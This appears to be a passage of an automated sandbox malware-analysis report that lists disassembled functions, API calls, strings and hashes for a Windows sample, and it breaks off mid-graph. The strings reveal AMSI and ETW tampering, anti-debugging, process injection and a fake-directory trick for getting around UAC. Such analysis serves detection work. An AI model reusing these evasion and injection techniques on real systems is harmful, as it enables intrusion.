                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256775434-0
                                                                                                                                        • Opcode ID: a1fd5c7d40c89f01cdddffb5342bf04af208d6cfcd4117bd806c6f0753cd0595
                                                                                                                                        • Instruction ID: 99e16792973d9a1f0885bb5d52b273e71f0993ed09464414e315c40999a66328
                                                                                                                                        • Opcode Fuzzy Hash: a1fd5c7d40c89f01cdddffb5342bf04af208d6cfcd4117bd806c6f0753cd0595
                                                                                                                                        • Instruction Fuzzy Hash: EA01E575944208AADF11EAE4CD41FCE77BDDB44700F509571B602E6180EA74AB088A64
                                                                                                                                        Function 02E2DBA8 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DBE3
                                                                                                                                        • NtClose.NTDLL(?), ref: 02E2DC5D
                                                                                                                                          • Part of subcall function 02E14C0C: SysFreeString.OLEAUT32(?), ref: 02E14C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$CloseFreeNameName_String
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 11680810-0
                                                                                                                                        • Opcode ID: 01181605a0ec2b17026ef0636c49ba40ed01616f58711d5febc64f843b61edae
                                                                                                                                        • Instruction ID: 3443880434e59c52ddd08731719b025c3813b58792d8da230d432bc8bb26f569
                                                                                                                                        • Opcode Fuzzy Hash: 01181605a0ec2b17026ef0636c49ba40ed01616f58711d5febc64f843b61edae
                                                                                                                                        • Instruction Fuzzy Hash: C621D371A80318BAEB11EAE4CC46FEE77BDAB08700F505471B705F71C0D6B4AA058B65
                                                                                                                                        Function 02E2EC6C Relevance: 236.3, APIs: 9, Strings: 120, Instructions: 10535filesleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                          • Part of subcall function 02E2EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02E2EF90,UacInitialize,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanString), ref: 02E2EB92
                                                                                                                                          • Part of subcall function 02E2EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E2EBA4
                                                                                                                                          • Part of subcall function 02E2EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E2EBF8
                                                                                                                                          • Part of subcall function 02E2EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E2EC0A
                                                                                                                                          • Part of subcall function 02E2EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E2EC21
                                                                                                                                          • Part of subcall function 02E1C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F658C8,?,02E2FBF6,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession), ref: 02E1C2FB
                                                                                                                                          • Part of subcall function 02E2DBA8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DBE3
                                                                                                                                          • Part of subcall function 02E2DBA8: NtClose.NTDLL(?), ref: 02E2DC5D
                                                                                                                                          • Part of subcall function 02E17E34: GetFileAttributesA.KERNEL32(00000000,?,02E32A41,ScanString,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,Initialize), ref: 02E17E3F
                                                                                                                                          • Part of subcall function 02E2DAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
                                                                                                                                          • Part of subcall function 02E2DAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
                                                                                                                                          • Part of subcall function 02E2DAC4: NtClose.NTDLL(?), ref: 02E2DB73
                                                                                                                                          • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
                                                                                                                                          • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
                                                                                                                                          • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
                                                                                                                                          • Part of subcall function 02E28704: LoadLibraryW.KERNEL32(amsi), ref: 02E2870D
                                                                                                                                          • Part of subcall function 02E28704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E2876C
                                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,02E3B328), ref: 02E349AF
                                                                                                                                          • Part of subcall function 02E2DA3C: RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                          • Part of subcall function 02E2DA3C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                          • Part of subcall function 02E2DA3C: NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02E34BAF
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02E34C05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePath$Library$AddressModuleNameProc$FreeHandleName_$CloseLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
                                                                                                                                        • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                        • API String ID: 4208238443-2905671141
                                                                                                                                        • Opcode ID: 38d602b386972f8e6903c0388002d2e8fd780f03a9d013388f269c4a78e53585
                                                                                                                                        • Instruction ID: 46cf618453b60b30ca894a40d12a428ed7e2572a680394807f9f101e8f7b2059
                                                                                                                                        • Opcode Fuzzy Hash: 38d602b386972f8e6903c0388002d2e8fd780f03a9d013388f269c4a78e53585
                                                                                                                                        • Instruction Fuzzy Hash: C4240975A801998FDB11EB64DD84ADE73F6AF84304F64E0B5F04AA7358DA70AE85CF10
                                                                                                                                        Function 02E3786F Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2772processthreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 5349 2e3786f-2e37c5f call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14898 5464 2e37c65-2e37e38 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14798 call 2e1494c call 2e14d20 call 2e14d9c CreateProcessAsUserW 5349->5464 5465 2e38ae9-2e38c6c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14898 5349->5465 5574 2e37eb6-2e37fc1 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 5464->5574 5575 2e37e3a-2e37eb1 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 5464->5575 5554 2e38c72-2e38c81 call 2e14898 5465->5554 5555 2e39418-2e3aa1d call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c * 16 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e146a4 * 2 call 2e2881c call 2e27b90 call 2e28184 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c ExitProcess 5465->5555 5554->5555 5564 2e38c87-2e38f5a call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e2e538 call 2e1480c call 2e1494c call 2e146a4 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e17e10 5554->5564 5822 2e39212-2e39413 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e149a4 call 2e28ba8 5564->5822 5823 2e38f60-2e3920d call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e14d8c * 2 call 2e14734 call 2e2dac4 5564->5823 5675 2e37fc3-2e37fc6 5574->5675 5676 2e37fc8-2e382e8 call 2e149a4 call 2e2dc88 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e2cf9c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 5574->5676 5575->5574 5675->5676 5990 2e38301-2e38ae4 call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c ResumeThread call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c CloseHandle call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e27ecc call 2e28798 * 6 CloseHandle call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c call 2e1480c call 2e1494c call 2e146a4 call 2e14798 call 2e1494c call 2e146a4 call 2e2881c 5676->5990 5991 2e382ea-2e382fc call 2e2857c 5676->5991 5822->5555 5823->5822 5990->5465 5991->5990
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                        • CreateProcessAsUserW.ADVAPI32(02F657D8,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F657DC,02F65820,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00), ref: 02E37E31
                                                                                                                                        • ResumeThread.KERNEL32(02F65824,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0), ref: 02E3847B
                                                                                                                                        • CloseHandle.KERNEL32(02F65820,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,02F65824,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00), ref: 02E385FA
                                                                                                                                          • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
                                                                                                                                          • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
                                                                                                                                          • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
                                                                                                                                        • CloseHandle.KERNEL32(02F65820,02F65820,ScanBuffer,02E6CF00,02E3AFD0,UacInitialize,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,UacScan,02E6CF00), ref: 02E389EC
                                                                                                                                          • Part of subcall function 02E2DAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
                                                                                                                                          • Part of subcall function 02E2DAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
                                                                                                                                          • Part of subcall function 02E2DAC4: NtClose.NTDLL(?), ref: 02E2DB73
                                                                                                                                          • Part of subcall function 02E28184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E2820E), ref: 02E281F0
                                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,Initialize,02E6CF00,02E3AFD0,00000000,00000000,00000000,ScanString,02E6CF00,02E3AFD0), ref: 02E3AA1D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleLibrary$AddressFreePathProcProcess$CacheCreateExitFileFlushInstructionLoadModuleNameName_ResumeThreadUserWrite
                                                                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                        • API String ID: 4004194653-1225450241
                                                                                                                                        • Opcode ID: f9f0b7dacfad9f4334a1473d813c9d512d2094f2f4536cc388ad01dd7a56f4d8
                                                                                                                                        • Instruction ID: 746e8ac5a0c705dc9fc30368749b31cd23aa677c65779e174d7e8ccf8e90ef15
                                                                                                                                        • Opcode Fuzzy Hash: f9f0b7dacfad9f4334a1473d813c9d512d2094f2f4536cc388ad01dd7a56f4d8
                                                                                                                                        • Instruction Fuzzy Hash: B543F975A801988BDB12EB65DD849DE73F6AF84305F64E0F5F04AA7358DA30AE85CF10
                                                                                                                                        Function 02E11727 Relevance: 9.0, APIs: 7, Instructions: 288sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 8533 2e11727-2e11736 8534 2e11968-2e1196d 8533->8534 8535 2e1173c-2e1174c 8533->8535 8538 2e11a80-2e11a83 8534->8538 8539 2e11973-2e11984 8534->8539 8536 2e117a4-2e117ad 8535->8536 8537 2e1174e-2e1175b 8535->8537 8536->8537 8544 2e117af-2e117bb 8536->8544 8540 2e11774-2e11780 8537->8540 8541 2e1175d-2e1176a 8537->8541 8545 2e11684-2e116ad VirtualAlloc 8538->8545 8546 2e11a89-2e11a8b 8538->8546 8542 2e11986-2e119a2 8539->8542 8543 2e11938-2e11945 8539->8543 8548 2e117f0-2e117f9 8540->8548 8549 2e11782-2e11790 8540->8549 8550 2e11794-2e117a1 8541->8550 8551 2e1176c-2e11770 8541->8551 8554 2e119b0-2e119bf 8542->8554 8555 2e119a4-2e119ac 8542->8555 8543->8542 8547 2e11947-2e1195b Sleep 8543->8547 8544->8537 8556 2e117bd-2e117c9 8544->8556 8552 2e116df-2e116e5 8545->8552 8553 2e116af-2e116dc call 2e11644 8545->8553 8547->8542 8557 2e1195d-2e11964 Sleep 8547->8557 8563 2e117fb-2e11808 8548->8563 8564 2e1182c-2e11836 8548->8564 8553->8552 8560 2e119c1-2e119d5 8554->8560 8561 2e119d8-2e119e0 8554->8561 8559 2e11a0c-2e11a22 8555->8559 8556->8537 8562 2e117cb-2e117de Sleep 8556->8562 8557->8543 8565 2e11a24-2e11a32 8559->8565 8566 2e11a3b-2e11a47 8559->8566 8560->8559 8571 2e119e2-2e119fa 8561->8571 8572 2e119fc-2e119fe call 2e115cc 8561->8572 8562->8537 8570 2e117e4-2e117eb Sleep 8562->8570 8563->8564 8573 2e1180a-2e1181e Sleep 8563->8573 8567 2e118a8-2e118b4 8564->8567 8568 2e11838-2e11863 8564->8568 8565->8566 8575 2e11a34 8565->8575 8578 2e11a49-2e11a5c 8566->8578 8579 2e11a68 8566->8579 8580 2e118b6-2e118c8 8567->8580 8581 2e118dc-2e118eb call 2e115cc 8567->8581 8576 2e11865-2e11873 8568->8576 8577 2e1187c-2e1188a 8568->8577 8570->8536 8582 2e11a03-2e11a0b 8571->8582 8572->8582 8573->8564 8574 